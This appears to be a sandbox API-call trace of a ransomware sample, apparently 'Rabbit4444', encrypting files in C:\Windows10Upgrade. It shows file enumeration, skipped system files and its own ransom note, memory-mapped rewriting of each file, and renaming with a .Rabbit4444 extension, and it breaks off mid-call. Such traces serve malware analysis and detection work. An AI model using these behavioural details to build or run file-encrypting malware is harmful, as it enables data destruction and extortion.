[0044.916] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\GatherOSState.EXE" (normalized: "c:\\windows10upgrade\\gatherosstate.exe"), lpNewFileName="C:\\Windows10Upgrade\\GatherOSState.EXE.Rabbit4444" (normalized: "c:\\windows10upgrade\\gatherosstate.exe.rabbit4444"), dwFlags=0x1) returned 1 [0044.917] InterlockedExchangeAdd (in: Addend=0xff618, Value=564944 | out: Addend=0xff618) returned 817888 [0044.917] InterlockedExchangeAdd (in: Addend=0xff624, Value=372 | out: Addend=0xff624) returned 1294 [0044.917] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39058e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39058e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x83cc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetCurrentDeploy.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0044.917] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.917] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.917] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="Rabbit4444.exe") returned -1 [0044.917] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2=".") returned 1 [0044.917] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="..") returned 1 [0044.917] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="windows") returned -1 [0044.917] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="bootmgr") returned 1 [0044.918] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="pagefile.sys") returned -1 [0044.918] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="boot") returned 1 [0044.918] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="ids.txt") returned -1 [0044.918] lstrcmpiW (lpString1="GetCurrentDeploy.dll", lpString2="NTUSER.DAT") returned -1 [0044.918] lstrcpyW (in: lpString1=0x130eb60, lpString2="GetCurrentDeploy.dll" | out: lpString1="GetCurrentDeploy.dll") returned="GetCurrentDeploy.dll" [0044.918] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GetCurrentDeploy.dll", dwFileAttributes=0x0) returned 1 [0044.918] lstrlenW (lpString="GetCurrentDeploy.dll") returned 20 [0044.918] lstrlenW (lpString="Rabbit4444") returned 10 [0044.918] lstrcmpiW (lpString1="Deploy.dll", lpString2="Rabbit4444") returned -1 [0044.918] lstrlenW (lpString=".dll") returned 4 [0044.918] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.918] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea392ca4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea392ca4, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~2.DLL")) returned 1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="Rabbit4444.exe") returned -1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2=".") returned 1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="..") returned 1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="windows") returned -1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="bootmgr") returned 1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="pagefile.sys") returned -1 [0044.918] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="boot") returned 1 [0044.919] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="ids.txt") returned -1 [0044.919] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="NTUSER.DAT") returned -1 [0044.919] lstrcpyW (in: lpString1=0x130eb60, lpString2="GetCurrentOOBE.dll" | out: lpString1="GetCurrentOOBE.dll") returned="GetCurrentOOBE.dll" [0044.919] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GetCurrentOOBE.dll", dwFileAttributes=0x0) returned 1 [0044.919] lstrlenW (lpString="GetCurrentOOBE.dll") returned 18 [0044.919] lstrlenW (lpString="Rabbit4444") returned 10 [0044.919] lstrcmpiW (lpString1="ntOOBE.dll", lpString2="Rabbit4444") returned -1 [0044.919] lstrlenW (lpString=".dll") returned 4 [0044.919] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0044.919] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39539e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39539e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x11ec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetCurrentRollback.EXE", cAlternateFileName="GETCUR~1.EXE")) returned 1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="Rabbit4444.exe") returned -1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2=".") returned 1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="..") returned 1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="windows") returned -1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="bootmgr") returned 1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="pagefile.sys") returned -1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="boot") returned 1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="ids.txt") returned -1 [0044.919] lstrcmpiW (lpString1="GetCurrentRollback.EXE", lpString2="NTUSER.DAT") returned -1 [0044.919] lstrcpyW (in: lpString1=0x130eb60, lpString2="GetCurrentRollback.EXE" | out: lpString1="GetCurrentRollback.EXE") returned="GetCurrentRollback.EXE" [0044.919] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE", dwFileAttributes=0x0) returned 1 [0044.921] lstrlenW (lpString="GetCurrentRollback.EXE") returned 22 [0044.921] lstrlenW (lpString="Rabbit4444") returned 10 [0044.921] lstrcmpiW (lpString1="llback.EXE", lpString2="Rabbit4444") returned -1 [0044.921] lstrlenW (lpString=".dll") returned 4 [0044.921] lstrcmpiW (lpString1=".EXE", lpString2=".dll") returned 1 [0044.921] lstrlenW (lpString=".lnk") returned 4 [0044.921] lstrcmpiW (lpString1=".EXE", lpString2=".lnk") returned -1 [0044.921] lstrlenW (lpString=".ini") returned 4 [0044.921] lstrcmpiW (lpString1=".EXE", lpString2=".ini") returned -1 [0044.921] lstrlenW (lpString=".sys") returned 4 [0044.921] lstrcmpiW (lpString1=".EXE", lpString2=".sys") returned -1 [0044.921] CreateFileW (lpFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE" (normalized: "c:\\windows10upgrade\\getcurrentrollback.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0044.921] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0044.921] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13623171799) returned 1 [0044.921] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=73416) returned 1 [0044.921] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0044.921] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0044.921] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x121d0, lpName=0x0) returned 0x280 [0044.923] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x121d0) returned 0x70000 [0045.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0045.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0045.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0045.133] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0045.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0045.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0045.133] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13644375453) returned 1 [0045.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0045.133] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0045.133] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0045.134] CloseHandle (hObject=0x280) returned 1 [0045.134] CloseHandle (hObject=0x278) returned 1 [0045.137] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\GetCurrentRollback.EXE.Rabbit4444") returned 53 [0045.137] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE" (normalized: "c:\\windows10upgrade\\getcurrentrollback.exe"), lpNewFileName="C:\\Windows10Upgrade\\GetCurrentRollback.EXE.Rabbit4444" (normalized: "c:\\windows10upgrade\\getcurrentrollback.exe.rabbit4444"), dwFlags=0x1) returned 1 [0045.138] InterlockedExchangeAdd (in: Addend=0xff618, Value=73424 | out: Addend=0xff618) returned 1382832 [0045.138] InterlockedExchangeAdd (in: Addend=0xff624, Value=212 | out: Addend=0xff624) returned 1666 [0045.138] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39673d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39673d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x6cc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HttpHelper.exe", cAlternateFileName="HTTPHE~1.EXE")) returned 1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="Rabbit4444.exe") returned -1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2=".") returned 1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="..") returned 1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="windows") returned -1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="bootmgr") returned 1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="pagefile.sys") returned -1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="boot") returned 1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="ids.txt") returned -1 [0045.138] lstrcmpiW (lpString1="HttpHelper.exe", lpString2="NTUSER.DAT") returned -1 [0045.138] lstrcpyW (in: lpString1=0x130eb60, lpString2="HttpHelper.exe" | out: lpString1="HttpHelper.exe") returned="HttpHelper.exe" [0045.138] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\HttpHelper.exe", dwFileAttributes=0x0) returned 1 [0045.139] lstrlenW (lpString="HttpHelper.exe") returned 14 [0045.139] lstrlenW (lpString="Rabbit4444") returned 10 [0045.139] lstrcmpiW (lpString1="Helper.exe", lpString2="Rabbit4444") returned -1 [0045.139] lstrlenW (lpString=".dll") returned 4 [0045.139] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0045.139] lstrlenW (lpString=".lnk") returned 4 [0045.139] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0045.139] lstrlenW (lpString=".ini") returned 4 [0045.139] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0045.139] lstrlenW (lpString=".sys") returned 4 [0045.139] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0045.139] CreateFileW (lpFileName="C:\\Windows10Upgrade\\HttpHelper.exe" (normalized: "c:\\windows10upgrade\\httphelper.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0045.139] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0045.139] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13644986022) returned 1 [0045.139] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=27848) returned 1 [0045.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0045.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0045.139] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6fd0, lpName=0x0) returned 0x280 [0045.145] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6fd0) returned 0x70000 [0045.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0045.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0045.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0045.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0045.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0045.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0045.274] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13658482358) returned 1 [0045.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0045.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0045.274] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0045.275] CloseHandle (hObject=0x280) returned 1 [0045.275] CloseHandle (hObject=0x278) returned 1 [0045.277] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\HttpHelper.exe.Rabbit4444") returned 45 [0045.277] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\HttpHelper.exe" (normalized: "c:\\windows10upgrade\\httphelper.exe"), lpNewFileName="C:\\Windows10Upgrade\\HttpHelper.exe.Rabbit4444" (normalized: "c:\\windows10upgrade\\httphelper.exe.rabbit4444"), dwFlags=0x1) returned 1 [0045.277] InterlockedExchangeAdd (in: Addend=0xff618, Value=27856 | out: Addend=0xff618) returned 1456256 [0045.278] InterlockedExchangeAdd (in: Addend=0xff624, Value=134 | out: Addend=0xff624) returned 1878 [0045.278] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PostOOBEScript.cmd", cAlternateFileName="POSTOO~1.CMD")) returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="Rabbit4444.exe") returned -1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2=".") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="..") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="windows") returned -1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="bootmgr") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="pagefile.sys") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="boot") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="ids.txt") returned 1 [0045.278] lstrcmpiW (lpString1="PostOOBEScript.cmd", lpString2="NTUSER.DAT") returned 1 [0045.278] lstrcpyW (in: lpString1=0x130eb60, lpString2="PostOOBEScript.cmd" | out: lpString1="PostOOBEScript.cmd") returned="PostOOBEScript.cmd" [0045.278] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd", dwFileAttributes=0x0) returned 1 [0045.279] lstrlenW (lpString="PostOOBEScript.cmd") returned 18 [0045.279] lstrlenW (lpString="Rabbit4444") returned 10 [0045.279] lstrcmpiW (lpString1="Script.cmd", lpString2="Rabbit4444") returned 1 [0045.279] lstrlenW (lpString=".dll") returned 4 [0045.279] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0045.279] lstrlenW (lpString=".lnk") returned 4 [0045.279] lstrcmpiW (lpString1=".cmd", lpString2=".lnk") returned -1 [0045.279] lstrlenW (lpString=".ini") returned 4 [0045.279] lstrcmpiW (lpString1=".cmd", lpString2=".ini") returned -1 [0045.279] lstrlenW (lpString=".sys") returned 4 [0045.279] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0045.279] CreateFileW (lpFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd" (normalized: "c:\\windows10upgrade\\postoobescript.cmd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0045.279] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0045.279] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13659001853) returned 1 [0045.279] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=577) returned 1 [0045.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0045.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0045.279] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x280 [0045.281] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x70000 [0045.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0045.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0045.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0045.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0045.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0045.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0045.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0045.283] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13659357452) returned 1 [0045.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0045.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0045.283] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0045.283] CloseHandle (hObject=0x280) returned 1 [0045.283] CloseHandle (hObject=0x278) returned 1 [0045.286] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\PostOOBEScript.cmd.Rabbit4444") returned 49 [0045.286] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd" (normalized: "c:\\windows10upgrade\\postoobescript.cmd"), lpNewFileName="C:\\Windows10Upgrade\\PostOOBEScript.cmd.Rabbit4444" (normalized: "c:\\windows10upgrade\\postoobescript.cmd.rabbit4444"), dwFlags=0x1) returned 1 [0045.286] InterlockedExchangeAdd (in: Addend=0xff618, Value=592 | out: Addend=0xff618) returned 1484112 [0045.286] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2012 [0045.286] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b3c1b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea3b3c1b, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="resources", cAlternateFileName="RESOUR~1")) returned 1 [0045.286] lstrcmpiW (lpString1="resources", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.286] lstrcmpiW (lpString1="resources", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.286] lstrcmpiW (lpString1="resources", lpString2="Rabbit4444.exe") returned 1 [0045.286] lstrcmpiW (lpString1="resources", lpString2=".") returned 1 [0045.287] lstrcmpiW (lpString1="resources", lpString2="..") returned 1 [0045.287] lstrcmpiW (lpString1="resources", lpString2="windows") returned -1 [0045.287] lstrcmpiW (lpString1="resources", lpString2="bootmgr") returned 1 [0045.287] lstrcmpiW (lpString1="resources", lpString2="pagefile.sys") returned 1 [0045.287] lstrcmpiW (lpString1="resources", lpString2="boot") returned 1 [0045.287] lstrcmpiW (lpString1="resources", lpString2="ids.txt") returned 1 [0045.287] lstrcmpiW (lpString1="resources", lpString2="NTUSER.DAT") returned 1 [0045.287] lstrcpyW (in: lpString1=0x130eb60, lpString2="resources" | out: lpString1="resources") returned="resources" [0045.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0045.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3c) returned 0x114ce8 [0045.289] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6570 [0045.289] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea9ef415, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea9ef415, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x624407ed, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0x3d14a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="upgrader_default.log", cAlternateFileName="UPGRAD~1.LOG")) returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="Rabbit4444.exe") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2=".") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="..") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="windows") returned -1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="bootmgr") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="pagefile.sys") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="boot") returned 1 [0045.289] lstrcmpiW (lpString1="upgrader_default.log", lpString2="ids.txt") returned 1 [0045.290] lstrcmpiW (lpString1="upgrader_default.log", lpString2="NTUSER.DAT") returned 1 [0045.290] lstrcpyW (in: lpString1=0x130eb60, lpString2="upgrader_default.log" | out: lpString1="upgrader_default.log") returned="upgrader_default.log" [0045.290] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\upgrader_default.log", dwFileAttributes=0x0) returned 1 [0045.290] lstrlenW (lpString="upgrader_default.log") returned 20 [0045.290] lstrlenW (lpString="Rabbit4444") returned 10 [0045.291] lstrcmpiW (lpString1="efault.log", lpString2="Rabbit4444") returned -1 [0045.291] lstrlenW (lpString=".dll") returned 4 [0045.291] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0045.291] lstrlenW (lpString=".lnk") returned 4 [0045.291] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0045.291] lstrlenW (lpString=".ini") returned 4 [0045.291] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0045.291] lstrlenW (lpString=".sys") returned 4 [0045.291] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0045.291] CreateFileW (lpFileName="C:\\Windows10Upgrade\\upgrader_default.log" (normalized: "c:\\windows10upgrade\\upgrader_default.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0045.291] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0045.291] QueryPerformanceCounter (in: 